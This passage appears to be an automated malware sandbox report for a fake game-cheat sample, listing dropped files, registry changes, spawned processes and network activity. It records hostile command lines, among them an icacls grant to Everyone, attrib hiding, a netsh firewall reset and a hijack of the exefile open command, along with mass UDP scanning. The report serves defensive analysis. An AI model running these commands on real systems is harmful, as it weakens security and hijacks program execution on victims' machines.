| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmlaunch.exe | C:\Windows\svchost.com | N/A |
| File created | C:\Program Files (x86)\Microsoft\DesktopLayer.exe | C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\px8A1A.tmp | C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5AE4BE3E-AF3D-11EE-9016-765658A41E32} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\TEMPEX~1.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
"4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
"bot.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
"RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\Desktop\1.exe
"C:\Users\Admin\Desktop\1.exe"
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\83F0.tmp\848E.tmp\848F.bat C:\Users\Admin\Desktop\1.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
"ska2pwej.aeh.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Program Files (x86)\Microsoft\DesktopLayer.exe
"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
"x2s443bc.cs1.exe"
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINUSC~1.EXE
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
"C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
C:\Users\Admin\AppData\Local\Temp\is-I1ATN.tmp\ska2pwej.aeh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I1ATN.tmp\ska2pwej.aeh.tmp" /SL5="$3029E,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2580 CREDAT:82945 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\richedit.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Program Files (x86)\Microsoft\DesktopLayer.exe
"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
C:\Users\Admin\AppData\Local\Temp\is-1LPUI.tmp\x2s443bc.cs1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1LPUI.tmp\x2s443bc.cs1.tmp" /SL5="$B0060,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\89AD.tmp\splitterrypted.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 88381704838868.bat
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\richedit.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\richedit.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\8B72.tmp\spwak.vbs
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| SE | 171.25.193.9:80 | tcp | |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.193.25.171.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| N/A | 127.0.0.1:49838 | tcp | |
| US | 8.8.8.8:53 | d1.udashi.com | udp |
| CN | 36.248.64.77:80 | d1.udashi.com | tcp |
| US | 8.8.8.8:53 | 77.64.248.36.in-addr.arpa | udp |
| IE | 93.107.12.0:6893 | udp | |
| IE | 93.107.12.1:6893 | udp | |
| IE | 93.107.12.2:6893 | udp | |
| IE | 93.107.12.3:6893 | udp | |
| IE | 93.107.12.4:6893 | udp | |
| IE | 93.107.12.5:6893 | udp | |
| IE | 93.107.12.6:6893 | udp | |
| IE | 93.107.12.7:6893 | udp | |
| IE | 93.107.12.8:6893 | udp | |
| IE | 93.107.12.9:6893 | udp | |
| IE | 93.107.12.10:6893 | udp | |
| IE | 93.107.12.11:6893 | udp | |
| IE | 93.107.12.12:6893 | udp | |
| IE | 93.107.12.13:6893 | udp | |
| IE | 93.107.12.14:6893 | udp | |
| IE | 93.107.12.15:6893 | udp | |
| IE | 93.107.12.16:6893 | udp | |
| IE | 93.107.12.17:6893 | udp | |
| IE | 93.107.12.18:6893 | udp | |
| IE | 93.107.12.19:6893 | udp | |
| IE | 93.107.12.20:6893 | udp | |
| IE | 93.107.12.21:6893 | udp | |
| IE | 93.107.12.22:6893 | udp | |
| IE | 93.107.12.23:6893 | udp | |
| IE | 93.107.12.24:6893 | udp | |
| IE | 93.107.12.25:6893 | udp | |
| IE | 93.107.12.26:6893 | udp | |
| IE | 93.107.12.27:6893 | udp | |
| IE | 93.107.12.28:6893 | udp | |
| IE | 93.107.12.29:6893 | udp | |
| IE | 93.107.12.30:6893 | udp | |
| IE | 93.107.12.31:6893 | udp | |
| TR | 95.1.200.0:6893 | udp | |
| TR | 95.1.200.1:6893 | udp | |
| TR | 95.1.200.2:6893 | udp | |
| TR | 95.1.200.3:6893 | udp | |
| TR | 95.1.200.4:6893 | udp | |
| TR | 95.1.200.5:6893 | udp | |
| TR | 95.1.200.6:6893 | udp | |
| TR | 95.1.200.7:6893 | udp | |
| TR | 95.1.200.8:6893 | udp | |
| TR | 95.1.200.9:6893 | udp | |
| TR | 95.1.200.10:6893 | udp | |
| TR | 95.1.200.11:6893 | udp | |
| TR | 95.1.200.12:6893 | udp | |
| TR | 95.1.200.13:6893 | udp | |
| TR | 95.1.200.14:6893 | udp | |
| TR | 95.1.200.15:6893 | udp | |
| TR | 95.1.200.16:6893 | udp | |
| TR | 95.1.200.17:6893 | udp | |
| TR | 95.1.200.18:6893 | udp | |
| TR | 95.1.200.19:6893 | udp | |
| TR | 95.1.200.20:6893 | udp | |
| TR | 95.1.200.21:6893 | udp | |
| TR | 95.1.200.22:6893 | udp | |
| TR | 95.1.200.23:6893 | udp | |
| TR | 95.1.200.24:6893 | udp | |
| TR | 95.1.200.25:6893 | udp | |
| TR | 95.1.200.26:6893 | udp | |
| TR | 95.1.200.27:6893 | udp | |
| TR | 95.1.200.28:6893 | udp | |
| TR | 95.1.200.29:6893 | udp | |
| TR | 95.1.200.30:6893 | udp | |
| TR | 95.1.200.31:6893 | udp | |
| FR | 87.98.176.0:6893 | udp | |
| FR | 87.98.176.1:6893 | udp | |
| FR | 87.98.176.2:6893 | udp | |
| FR | 87.98.176.3:6893 | udp | |
| FR | 87.98.176.4:6893 | udp | |
| FR | 87.98.176.5:6893 | udp | |
| FR | 87.98.176.6:6893 | udp | |
| FR | 87.98.176.7:6893 | udp | |
| FR | 87.98.176.8:6893 | udp | |
| FR | 87.98.176.9:6893 | udp | |
| FR | 87.98.176.10:6893 | udp | |
| FR | 87.98.176.11:6893 | udp | |
| FR | 87.98.176.12:6893 | udp | |
| FR | 87.98.176.13:6893 | udp | |
| FR | 87.98.176.14:6893 | udp | |
| FR | 87.98.176.15:6893 | udp | |
| FR | 87.98.176.16:6893 | udp | |
| FR | 87.98.176.17:6893 | udp | |
| FR | 87.98.176.18:6893 | udp | |
| FR | 87.98.176.19:6893 | udp | |
| FR | 87.98.176.20:6893 | udp | |
| FR | 87.98.176.21:6893 | udp | |
| FR | 87.98.176.22:6893 | udp | |
| FR | 87.98.176.23:6893 | udp | |
| FR | 87.98.176.24:6893 | udp | |
| FR | 87.98.176.25:6893 | udp | |
| FR | 87.98.176.26:6893 | udp | |
| FR | 87.98.176.27:6893 | udp | |
| FR | 87.98.176.28:6893 | udp | |
| FR | 87.98.176.29:6893 | udp | |
| FR | 87.98.176.30:6893 | udp | |
| FR | 87.98.176.31:6893 | udp | |
| FR | 87.98.176.32:6893 | udp | |
| FR | 87.98.176.33:6893 | udp | |
| FR | 87.98.176.34:6893 | udp | |
| FR | 87.98.176.35:6893 | udp | |
| FR | 87.98.176.36:6893 | udp | |
| FR | 87.98.176.37:6893 | udp | |
| FR | 87.98.176.38:6893 | udp | |
| FR | 87.98.176.39:6893 | udp | |
| FR | 87.98.176.40:6893 | udp | |
| FR | 87.98.176.41:6893 | udp | |
| FR | 87.98.176.42:6893 | udp | |
| FR | 87.98.176.43:6893 | udp | |
| FR | 87.98.176.44:6893 | udp | |
| FR | 87.98.176.45:6893 | udp | |
| FR | 87.98.176.46:6893 | udp | |
| FR | 87.98.176.47:6893 | udp | |
| FR | 87.98.176.48:6893 | udp | |
| FR | 87.98.176.49:6893 | udp | |
| FR | 87.98.176.50:6893 | udp | |
| FR | 87.98.176.51:6893 | udp | |
| FR | 87.98.176.52:6893 | udp | |
| FR | 87.98.176.53:6893 | udp | |
| FR | 87.98.176.54:6893 | udp | |
| FR | 87.98.176.55:6893 | udp | |
| FR | 87.98.176.56:6893 | udp | |
| FR | 87.98.176.57:6893 | udp | |
| FR | 87.98.176.58:6893 | udp | |
| FR | 87.98.176.59:6893 | udp | |
| FR | 87.98.176.60:6893 | udp | |
| FR | 87.98.176.61:6893 | udp | |
| FR | 87.98.176.62:6893 | udp | |
| FR | 87.98.176.63:6893 | udp | |
| FR | 87.98.176.64:6893 | udp | |
| FR | 87.98.176.65:6893 | udp | |
| FR | 87.98.176.66:6893 | udp | |
| FR | 87.98.176.67:6893 | udp | |
| FR | 87.98.176.68:6893 | udp | |
| FR | 87.98.176.69:6893 | udp | |
| FR | 87.98.176.70:6893 | udp | |
| FR | 87.98.176.71:6893 | udp | |
| FR | 87.98.176.72:6893 | udp | |
| FR | 87.98.176.73:6893 | udp | |
| FR | 87.98.176.74:6893 | udp | |
| FR | 87.98.176.75:6893 | udp | |
| FR | 87.98.176.76:6893 | udp | |
| FR | 87.98.176.77:6893 | udp | |
| FR | 87.98.176.78:6893 | udp | |
| FR | 87.98.176.79:6893 | udp | |
| FR | 87.98.176.80:6893 | udp | |
| FR | 87.98.176.81:6893 | udp | |
| FR | 87.98.176.82:6893 | udp | |
| FR | 87.98.176.83:6893 | udp | |
| FR | 87.98.176.84:6893 | udp | |
| FR | 87.98.176.85:6893 | udp | |
| FR | 87.98.176.86:6893 | udp | |
| FR | 87.98.176.87:6893 | udp | |
| FR | 87.98.176.88:6893 | udp | |
| FR | 87.98.176.89:6893 | udp | |
| FR | 87.98.176.90:6893 | udp | |
| FR | 87.98.176.91:6893 | udp | |
| FR | 87.98.176.92:6893 | udp | |
| FR | 87.98.176.93:6893 | udp | |
| FR | 87.98.176.94:6893 | udp | |
| FR | 87.98.176.95:6893 | udp | |
| FR | 87.98.176.96:6893 | udp | |
| FR | 87.98.176.97:6893 | udp | |
| FR | 87.98.176.98:6893 | udp | |
| FR | 87.98.176.99:6893 | udp | |
| FR | 87.98.176.100:6893 | udp | |
| FR | 87.98.176.101:6893 | udp | |
| FR | 87.98.176.102:6893 | udp | |
| FR | 87.98.176.103:6893 | udp | |
| FR | 87.98.176.104:6893 | udp | |
| FR | 87.98.176.105:6893 | udp | |
| FR | 87.98.176.106:6893 | udp | |
| FR | 87.98.176.107:6893 | udp | |
| FR | 87.98.176.108:6893 | udp | |
| FR | 87.98.176.109:6893 | udp | |
| FR | 87.98.176.110:6893 | udp | |
| FR | 87.98.176.111:6893 | udp | |
| FR | 87.98.176.112:6893 | udp | |
| FR | 87.98.176.113:6893 | udp | |
| FR | 87.98.176.114:6893 | udp | |
| FR | 87.98.176.115:6893 | udp | |
| FR | 87.98.176.116:6893 | udp | |
| FR | 87.98.176.117:6893 | udp | |
| FR | 87.98.176.118:6893 | udp | |
| FR | 87.98.176.119:6893 | udp | |
| FR | 87.98.176.120:6893 | udp | |
| FR | 87.98.176.121:6893 | udp | |
| FR | 87.98.176.122:6893 | udp | |
| FR | 87.98.176.123:6893 | udp | |
| FR | 87.98.176.124:6893 | udp | |
| FR | 87.98.176.125:6893 | udp | |
| FR | 87.98.176.126:6893 | udp | |
| FR | 87.98.176.127:6893 | udp | |
| FR | 87.98.176.128:6893 | udp | |
| FR | 87.98.176.129:6893 | udp | |
| FR | 87.98.176.130:6893 | udp | |
| FR | 87.98.176.131:6893 | udp | |
| FR | 87.98.176.132:6893 | udp | |
| FR | 87.98.176.133:6893 | udp | |
| FR | 87.98.176.134:6893 | udp | |
| FR | 87.98.176.135:6893 | udp | |
| FR | 87.98.176.136:6893 | udp | |
| FR | 87.98.176.137:6893 | udp | |
| FR | 87.98.176.138:6893 | udp | |
| FR | 87.98.176.139:6893 | udp | |
| FR | 87.98.176.140:6893 | udp | |
| FR | 87.98.176.141:6893 | udp | |
| FR | 87.98.176.142:6893 | udp | |
| FR | 87.98.176.143:6893 | udp | |
| FR | 87.98.176.144:6893 | udp | |
| FR | 87.98.176.145:6893 | udp | |
| FR | 87.98.176.146:6893 | udp | |
| FR | 87.98.176.147:6893 | udp | |
| FR | 87.98.176.148:6893 | udp | |
| FR | 87.98.176.149:6893 | udp | |
| FR | 87.98.176.150:6893 | udp | |
| FR | 87.98.176.151:6893 | udp | |
| FR | 87.98.176.152:6893 | udp | |
| FR | 87.98.176.153:6893 | udp | |
| FR | 87.98.176.154:6893 | udp | |
| FR | 87.98.176.155:6893 | udp | |
| FR | 87.98.176.156:6893 | udp | |
| FR | 87.98.176.157:6893 | udp | |
| FR | 87.98.176.158:6893 | udp | |
| FR | 87.98.176.159:6893 | udp | |
| FR | 87.98.176.160:6893 | udp | |
| FR | 87.98.176.161:6893 | udp | |
| FR | 87.98.176.162:6893 | udp | |
| FR | 87.98.176.163:6893 | udp | |
| FR | 87.98.176.164:6893 | udp | |
| FR | 87.98.176.165:6893 | udp | |
| FR | 87.98.176.166:6893 | udp | |
| FR | 87.98.176.167:6893 | udp | |
| FR | 87.98.176.168:6893 | udp | |
| FR | 87.98.176.169:6893 | udp | |
| FR | 87.98.176.170:6893 | udp | |
| FR | 87.98.176.171:6893 | udp | |
| FR | 87.98.176.172:6893 | udp | |
| FR | 87.98.176.173:6893 | udp | |
| FR | 87.98.176.174:6893 | udp | |
| FR | 87.98.176.175:6893 | udp | |
| FR | 87.98.176.176:6893 | udp | |
| FR | 87.98.176.177:6893 | udp | |
| FR | 87.98.176.178:6893 | udp | |
| FR | 87.98.176.179:6893 | udp | |
| FR | 87.98.176.180:6893 | udp | |
| FR | 87.98.176.181:6893 | udp | |
| FR | 87.98.176.182:6893 | udp | |
| FR | 87.98.176.183:6893 | udp | |
| FR | 87.98.176.184:6893 | udp | |
| FR | 87.98.176.185:6893 | udp | |
| FR | 87.98.176.186:6893 | udp | |
| FR | 87.98.176.187:6893 | udp | |
| FR | 87.98.176.188:6893 | udp | |
| FR | 87.98.176.189:6893 | udp | |
| FR | 87.98.176.190:6893 | udp | |
| FR | 87.98.176.191:6893 | udp | |
| FR | 87.98.176.192:6893 | udp | |
| FR | 87.98.176.193:6893 | udp | |
| FR | 87.98.176.194:6893 | udp | |
| FR | 87.98.176.195:6893 | udp | |
| FR | 87.98.176.196:6893 | udp | |
| FR | 87.98.176.197:6893 | udp | |
| FR | 87.98.176.198:6893 | udp | |
| FR | 87.98.176.199:6893 | udp | |
| FR | 87.98.176.200:6893 | udp | |
| FR | 87.98.176.201:6893 | udp | |
| FR | 87.98.176.202:6893 | udp | |
| FR | 87.98.176.203:6893 | udp | |
| FR | 87.98.176.204:6893 | udp | |
| FR | 87.98.176.205:6893 | udp | |
| FR | 87.98.176.206:6893 | udp | |
| FR | 87.98.176.207:6893 | udp | |
| FR | 87.98.176.208:6893 | udp | |
| FR | 87.98.176.209:6893 | udp | |
| FR | 87.98.176.210:6893 | udp | |
| FR | 87.98.176.211:6893 | udp | |
| FR | 87.98.176.212:6893 | udp | |
| FR | 87.98.176.213:6893 | udp | |
| FR | 87.98.176.214:6893 | udp | |
| FR | 87.98.176.215:6893 | udp | |
| FR | 87.98.176.216:6893 | udp | |
| FR | 87.98.176.217:6893 | udp | |
| FR | 87.98.176.218:6893 | udp | |
| FR | 87.98.176.219:6893 | udp | |
| FR | 87.98.176.220:6893 | udp | |
| FR | 87.98.176.221:6893 | udp | |
| FR | 87.98.176.222:6893 | udp | |
| FR | 87.98.176.223:6893 | udp | |
| FR | 87.98.176.224:6893 | udp | |
| FR | 87.98.176.225:6893 | udp | |
| FR | 87.98.176.226:6893 | udp | |
| FR | 87.98.176.227:6893 | udp | |
| FR | 87.98.176.228:6893 | udp | |
| FR | 87.98.176.229:6893 | udp | |
| FR | 87.98.176.230:6893 | udp | |
| FR | 87.98.176.231:6893 | udp | |
| FR | 87.98.176.232:6893 | udp | |
| FR | 87.98.176.233:6893 | udp | |
| FR | 87.98.176.234:6893 | udp | |
| FR | 87.98.176.235:6893 | udp | |
| FR | 87.98.176.236:6893 | udp | |
| FR | 87.98.176.237:6893 | udp | |
| FR | 87.98.176.238:6893 | udp | |
| FR | 87.98.176.239:6893 | udp | |
| FR | 87.98.176.240:6893 | udp | |
| FR | 87.98.176.241:6893 | udp | |
| FR | 87.98.176.242:6893 | udp | |
| FR | 87.98.176.243:6893 | udp | |
| FR | 87.98.176.244:6893 | udp | |
| FR | 87.98.176.245:6893 | udp | |
| FR | 87.98.176.246:6893 | udp | |
| FR | 87.98.176.247:6893 | udp | |
| FR | 87.98.176.248:6893 | udp | |
| FR | 87.98.176.249:6893 | udp | |
| FR | 87.98.176.250:6893 | udp | |
| FR | 87.98.176.251:6893 | udp | |
| FR | 87.98.176.252:6893 | udp | |
| FR | 87.98.176.253:6893 | udp | |
| FR | 87.98.176.254:6893 | udp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.12.107.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.200.1.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.200.1.95.in-addr.arpa | udp |
